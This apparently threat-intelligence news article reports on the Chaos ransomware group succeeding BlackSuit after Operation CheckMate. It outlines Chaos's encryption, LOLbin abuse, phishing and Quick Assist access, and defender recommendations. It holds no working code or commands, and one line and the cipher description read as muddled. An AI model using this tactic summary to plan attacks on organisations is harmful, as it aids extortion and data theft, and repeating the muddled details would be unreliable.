Chaos Ransomware Emerges from BlackSuit After Take-Down

Home page — News — Chaos Ransomware Emerges from BlackSuit After Take-Down

In July 2025, international law enforcement dismantled BlackSuit, but the cybercrime landscape shifted almost immediately: a new ransomware-as-a-service (RaaS) operation calling itself Chaos has taken its place. Cisco Talos and other threat intelligence teams warn that Chaos is already targeting large organizations across multiple continents.

Backdrop: Operation CheckMate Dismantles BlackSuit

Under Operation CheckMate, agencies from the U.S., EU and Ukraine collaborated to seize BlackSuit’s Tor hidden services and C2 infrastructure:

Seized servers in the Netherlands and Germany
Encrypted evidence plateaus for digital forensics
Joint effort by DOJ, DHS, US Secret Service, Europol, Ukrainian Cyber Police, UK NCA and more

“BlackSuit had extorted over $500 million in ransoms in fewer than two years. Disrupting its infrastructure delivers a significant blow to ransomware ecosystems,” said an official spokesperson at Europol.

Microsoft Stops China-Based Support for U.S. Cloud Systems

2025-07-27

Enterprise-Scale Attacks: Chaos’s Big-Game Hunting

Since its emergence in February 2025, Chaos has demonstrated “big-game hunting” tactics—focus on high-value targets in the US, UK, India and New Zealand, demanding ransoms averaging $250,000–$350,000. Victims receive a “readme.chaos.txt” note threatening data exfiltration, public disclosure, and DDoS if they refuse to pay.

Technical Deep Dive: Encryption and Attack Tools

Chaos employs a hybrid cryptosystem: AES-256 for bulk file encryption plus RSA-2048 to secure the session key. Analysis of a sample binary reveals:

ChaCha20 stream cipher fallback for large-volume encryption
Custom PE packer with anti-debugging routines and dynamic API resolution
Integration with Cobalt Strike beacons for C2 communication over HTTPS

Living-off-the-land binaries (LOLbins) are abused for stealth: certutil.exe drops payloads, bitsadmin.exe stages exfiltration, and mshta.exe runs obfuscated scripts in memory.

Inside North Korea’s ‘Laptop Farm’: U.S. Identities Fuel Cyber Revenue

2025-07-26

Initial Access and Tactics

Chaos gains entry via social engineering: spear-phishing emails with weaponized Office macros, or voice phishing that convinces helpdesk staff to launch Microsoft Quick Assist. Once inside, actors escalate privileges through impacket tools and deploy remote monitoring & management (RMM) agents.

Law Enforcement Countermeasures and Operation CheckMate

Technical forensics teams used disk images and network traffic captures to trace BlackSuit’s affiliate network. By sinkholing C2 domains and tracking cryptocurrency wallets, investigators disrupted payment flows and harvested decryption keys to assist victims.

Echelon Firmware Update Sparks Lock-In Debate

2025-07-25

Threat Intelligence and Future Outlook

“We assess Chaos is either a BlackSuit rebrand or staffed by former members,” said research lead Matt Watcher at Cisco Talos. “Their TTPs mirror Royal and Conti lineages in methodology and code reuse.”

Experts at Mandiant and CrowdStrike predict that frequent rebranding and affiliate churn will persist. Defenders should map Chaos tactics to the MITRE ATT&CK framework (T1486: Data Encrypted for Impact, T1566: Phishing) and deploy behavior-based EDR/XDR solutions.

Key Recommendations for Enterprises:

Enforce MFA on RDP and VPN endpoints
Monitor unusual Quick Assist sessions and LOLbin executions
Share indicators of compromise (IOCs) via threat intelligence platforms